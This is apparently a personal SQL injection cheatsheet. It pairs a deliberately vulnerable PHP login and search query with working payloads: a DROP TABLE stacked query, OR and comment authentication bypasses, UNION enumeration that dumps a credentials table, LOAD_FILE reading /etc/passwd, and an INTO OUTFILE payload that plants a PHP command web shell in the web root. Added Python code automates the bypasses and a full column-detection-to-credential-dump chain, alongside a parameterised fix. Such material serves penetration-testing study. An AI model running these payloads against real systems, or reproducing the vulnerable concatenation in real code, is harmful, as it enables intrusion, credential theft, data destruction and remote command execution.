These cheatsheets serve as my personal quick reference. Therefore, they’re less organized than the box walkthroughs, but I’ve shared them in case others find them useful.

SQL injection cheatsheet

Example of vulnerable PHP code

User input is directly passed in the SQL query.

<?php
$conn = new mysqli("localhost", "root", "password", "users");
$searchInput = $_POST['findUser'];
// Vulnerable on purpose: the POST parameter is concatenated straight into the SQL string
$query = "select * from logins where username like '%$searchInput'";
$result = $conn->query($query);

Example with regular user input:

select * from logins where username like '%admin'

Exploited by closing the quoted string: enter a ' to terminate the literal, a ; to end the statement, then comment out the rest of the original query with -- (MySQL requires whitespace after --, hence the -- - form):

1'; DROP TABLE users; -- -

Then, the query becomes:

select * from logins where username like '%1'; DROP TABLE users; -- -'

The trailing ' from the original query now sits inside the comment, so there is no syntax error. Caveat: this is a stacked query. mysqli::query() executes only a single statement, so the DROP would only run if the application used mysqli::multi_query() or a driver configured to allow multiple statements; whether ; works depends on the driver, not just on the DBMS.

Authentication bypass

Example of query being used for authentication:

SELECT * FROM logins WHERE username='admin' AND password = 'admin';

Verify whether application is vulnerable

Insert one of the following payloads in one of the fields:

'
"
#
;
)

Tip: try the URL-encoded forms as well (e.g. %27 for ' and %23 for #), since some filters only look at the decoded or the raw value.

Auth bypass with KNOWN username

METHOD: OR Injection

The query will be something like this:

If a single ' is submitted as the username, the query becomes SELECT * FROM logins WHERE username=''' AND password = 'something'; --> unbalanced quote --> syntax error, usually visible in the site response

Bypassing of the authentication can be done with OR injection:

admin' OR '1'='1

Query becomes:

SELECT * FROM logins WHERE username='admin' OR '1'='1' AND password='something';

AND binds tighter than OR (higher precedence). Therefore, the statement is grouped as:

WHERE username='admin' OR ( '1'='1' AND password='something' )

Evaluation results in:

WHERE username='admin' OR ( TRUE AND FALSE )

Further evaluation:

WHERE username='admin' OR (FALSE )

Further evaluation:

WHERE TRUE OR (FALSE) --> TRUE, so the admin row is returned and authentication is bypassed

Note that this works only when the username is known

METHOD: COMMENT Injection

Payload:

admin' -- -    (username field)
something     (password field, any value)

The query will be:

SELECT * FROM logins WHERE username='admin' -- - ' AND password = 'something';

Everything after -- is a comment, so the password check disappears entirely. In MySQL, # works as a line comment as well.

Note that this works only when the username is known

Auth bypass with UNKNOWN username

METHOD: OR Injection

For this, we need both fields to always return true. Then, the user present in the first row will be logged in.

payload:

' OR '1'='1 (username field)
' OR '1'='1 (password field)

Now, we get the following query:

SELECT * FROM logins WHERE username='' OR '1'='1' AND password='' OR '1'='1';

This is evaluated as follows:

WHERE username='' OR ('1'='1' AND password='') OR '1'='1'
WHERE FALSE OR (TRUE AND FALSE) OR TRUE
WHERE FALSE OR FALSE OR TRUE
TRUE

The WHERE clause is always true, so every row is returned. An application that only looks at the first row of the result logs you in as whichever user sits in that row.
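The three bypasses above (OR with a known username, comment with a known username, OR in both fields with an unknown username), run against a tiny in-memory database so the precedence rules can be checked rather than read. This is an added example, not code from the original cheatsheet; SQLite stands in for MySQL, the `logins` rows are constructed, and `build_vulnerable_query` repeats the string-concatenation mistake of the PHP snippet while `safe_login` shows the parameterised fix.

```python
import sqlite3

# Constructed sample rows standing in for the page's `logins` table.
SAMPLE_LOGINS = [("admin", "s3cret"), ("alice", "wonderland"), ("bob", "builder")]


def make_db():
    """In-memory SQLite database with a `logins` table (stand-in for MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO logins (username, password) VALUES (?, ?)", SAMPLE_LOGINS
    )
    return conn


def build_vulnerable_query(username, password):
    """String concatenation, the same mistake as the page's PHP example."""
    return (
        "SELECT * FROM logins WHERE username='" + username
        + "' AND password='" + password + "'"
    )


def vulnerable_login(conn, username, password):
    """Returns the usernames the authentication query matches (empty = login denied)."""
    query = build_vulnerable_query(username, password)
    return [row[1] for row in conn.execute(query)]


def safe_login(conn, username, password):
    """Parameterised query: the payloads are compared as plain strings and never match."""
    query = "SELECT * FROM logins WHERE username=? AND password=?"
    return [row[1] for row in conn.execute(query, (username, password))]


def demo():
    conn = make_db()
    return {
        "legit": vulnerable_login(conn, "admin", "s3cret"),
        "wrong_password": vulnerable_login(conn, "admin", "nope"),
        # AND binds tighter than OR: username='admin' OR ('1'='1' AND password='nope')
        "or_known_user": vulnerable_login(conn, "admin' OR '1'='1", "nope"),
        # same payload with a username that does not exist: the OR branch is false
        "or_wrong_user": vulnerable_login(conn, "nobody' OR '1'='1", "nope"),
        # -- turns the rest of the query into a comment, so the password check vanishes
        "comment_known_user": vulnerable_login(conn, "admin' -- -", "nope"),
        # both fields injected: the WHERE is always true, every row comes back
        "or_unknown_user": vulnerable_login(conn, "' OR '1'='1", "' OR '1'='1"),
        # the OR payload against the parameterised query
        "safe_or_payload": safe_login(conn, "admin' OR '1'='1", "nope"),
    }
```

`demo()` returns the matched usernames per payload: the known-username payloads match only admin, the wrong-username OR payload matches nothing, the double OR payload matches all three rows (admin first), and the parameterised query matches nothing.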

Union Injection

Detect number of columns

Order by method:

' order by 1-- -

Keep increasing the number until you receive an error; the last number that did not error is the column count.

UNION method:

' UNION select 1,2,3-- -

Keep adding values until the query stops erroring; the number of values in the first working SELECT is the column count.

Location of Injection

Often, not all columns are displayed on the web page. Therefore, we need to make sure our injected value lands in a column that is visible on the page; otherwise we will not see its output.

' UNION select 1,@@version,3,4-- - (testing what columns are displayed)

Database Enumeration

Identifying MYSQL

To identify whether it is MYSQL, use one of the following queries:

Query            | Scenario                         | Output in MySQL/MariaDB                          | Behaviour in other DBMS
SELECT @@version | When we have full query output   | MySQL version (e.g. 10.3.22-MariaDB-1ubuntu1)    | MSSQL returns its own version string; error with other DBMS
SELECT POW(1,1)  | When we only have numeric output | 1                                                | Error with other DBMS
SELECT SLEEP(5)  | Blind / no output                | Delays the response by 5 seconds and returns 0   | No delay with other DBMS
Getting data from the INFORMATION_SCHEMA database

This database tells us which databases are present, as well as their tables and columns.

To find all databases:

SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;

UNION injection example:

UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

Find current selected database:

SELECT database();
' UNION select 1,database(),2,3-- -

Find table names and their respective database (table_schema):

' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
Note that the WHERE clause can be omitted to list tables from every database.

Dump the columns of a table:

' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

DUMP the data:

' UNION select 1, username, password, 4 from dev.credentials-- -
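The column-count detection (ORDER BY and UNION methods), the check of which columns are reflected on the page, and the final table/column dump above, automated end to end. This is an added example, not code from the original cheatsheet. It assumes a hypothetical search page (`render_search_page`) that concatenates the term into `... LIKE '%term%'` and renders only two of the four selected columns; SQLite stands in for MySQL so it runs offline, the `users` and `credentials` rows are constructed, and `sqlite_master` plays the role of INFORMATION_SCHEMA.TABLES.

```python
import re
import sqlite3

# Constructed sample data. SQLite stands in for MySQL so the block runs offline;
# sqlite_master plays the role of INFORMATION_SCHEMA.TABLES.
SCHEMA_AND_DATA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, role TEXT);
INSERT INTO users (username, email, role) VALUES
    ('alice', 'alice@example.test', 'user'),
    ('bob', 'bob@example.test', 'user');
CREATE TABLE credentials (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO credentials (username, password) VALUES
    ('admin', 'P@ssw0rd'),
    ('backup', 'hunter2');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA_AND_DATA)
    return conn


def render_search_page(conn, term):
    """Hypothetical vulnerable search endpoint: the term is concatenated into the
    query, and the page shows only columns 2 and 4 (username, role) of the four."""
    query = f"SELECT id, username, email, role FROM users WHERE username LIKE '%{term}%'"
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error as exc:
        return f"Error: {exc}"
    return "\n".join(f"user: {row[1]} ({row[3]})" for row in rows)


ROW_RE = re.compile(r"^user: (.*) \((.*)\)$", re.MULTILINE)


def detect_column_count_order_by(search, max_cols=16):
    """ORDER BY n for increasing n; the last n that does not error is the column count."""
    count = 0
    for n in range(1, max_cols + 1):
        if search(f"' ORDER BY {n}-- -").startswith("Error"):
            break
        count = n
    return count


def detect_column_count_union(search, max_cols=16):
    """UNION SELECT 1,2,...,n for increasing n; the first n that works is the column count."""
    for n in range(1, max_cols + 1):
        cells = ",".join(str(i) for i in range(1, n + 1))
        if not search(f"' UNION SELECT {cells}-- -").startswith("Error"):
            return n
    return 0


def find_reflected_columns(search, ncols):
    """UNION a row of unique markers and see which of them appear on the page."""
    markers = [f"mrk{i}" for i in range(1, ncols + 1)]
    cells = ",".join(f"'{m}'" for m in markers)
    # AND 1=0 suppresses the genuine rows so only the injected row is rendered
    page = search(f"' AND 1=0 UNION SELECT {cells}-- -")
    return [i + 1 for i, m in enumerate(markers) if m in page]


def dump_columns(search, ncols, reflected, table, columns):
    """Put the wanted columns into the reflected positions, fill the rest with numbers."""
    cells = [str(i) for i in range(1, ncols + 1)]
    for pos, col in zip(reflected, columns):
        cells[pos - 1] = col
    page = search(f"' AND 1=0 UNION SELECT {','.join(cells)} FROM {table}-- -")
    return [(m.group(1), m.group(2)) for m in ROW_RE.finditer(page)]


def demo():
    conn = make_db()

    def search(term):
        return render_search_page(conn, term)

    ncols = detect_column_count_order_by(search)
    reflected = find_reflected_columns(search, ncols)
    return {
        "ncols": ncols,
        "ncols_union": detect_column_count_union(search),
        "reflected": reflected,
        # MySQL equivalent: table_name, table_schema FROM INFORMATION_SCHEMA.TABLES
        "tables": dump_columns(search, ncols, reflected, "sqlite_master", ["name", "type"]),
        "creds": dump_columns(search, ncols, reflected, "credentials", ["username", "password"]),
    }
```

`demo()` finds four columns by both methods, identifies columns 2 and 4 as the ones the page renders, lists the tables through those two positions, and then dumps username/password pairs from `credentials` the same way. Against MySQL the only changes are the INFORMATION_SCHEMA queries from the cheatsheet in place of `sqlite_master`.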

Reading Files

Requires the FILE privilege on the database user.

Check current user:

SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user
' UNION SELECT 1, user(), 3, 4-- -
' UNION SELECT 1, user, 3, 4 from mysql.user-- -

Check user privileges:

SELECT super_priv FROM mysql.user
' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- - (add WHERE user='<current user>' when there are many users)

Returns Y or N. The FILE privilege itself lives in the File_priv column of the same table.

Check other privileges:

' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- - (add WHERE grantee="'<user>'@'localhost'" when there are many users; note the grantee format includes the quotes)

Read files:

SELECT LOAD_FILE('/etc/passwd');
' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

Writing Files

Requires the FILE privilege, a secure_file_priv setting that permits the target directory, and write access for the MySQL OS user at that location on the backend server.

Check secure_file_priv global variable:

SHOW VARIABLES LIKE 'secure_file_priv'; (not via union)
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"
' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- - (union)

Note: information_schema.global_variables still exists in MariaDB, but in MySQL 5.7+ it moved to performance_schema.global_variables (the information_schema version is gone in MySQL 8.0).

If the variable is empty --> read/write anywhere the MySQL OS user can. If it names a directory --> read/write only inside that directory. If it is NULL --> LOAD_FILE and INTO OUTFILE are disabled.

We can write files using the following syntax:

SELECT * from users INTO OUTFILE '/tmp/credentials';
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt'; (same syntax is used to drop a web shell)
' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -

Note that /var/www/html is the default web root for Apache on Debian/Ubuntu

Writing Files: Web Shell

' union select "",'<?php system($_REQUEST["cmd"]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -

Request shell.php under the web root with ?cmd=<command> as a URL parameter to execute commands. The file is created as the MySQL OS user, so that user needs write access to the web root, and INTO OUTFILE refuses to overwrite an existing file, so pick a fresh name if the first attempt already landed.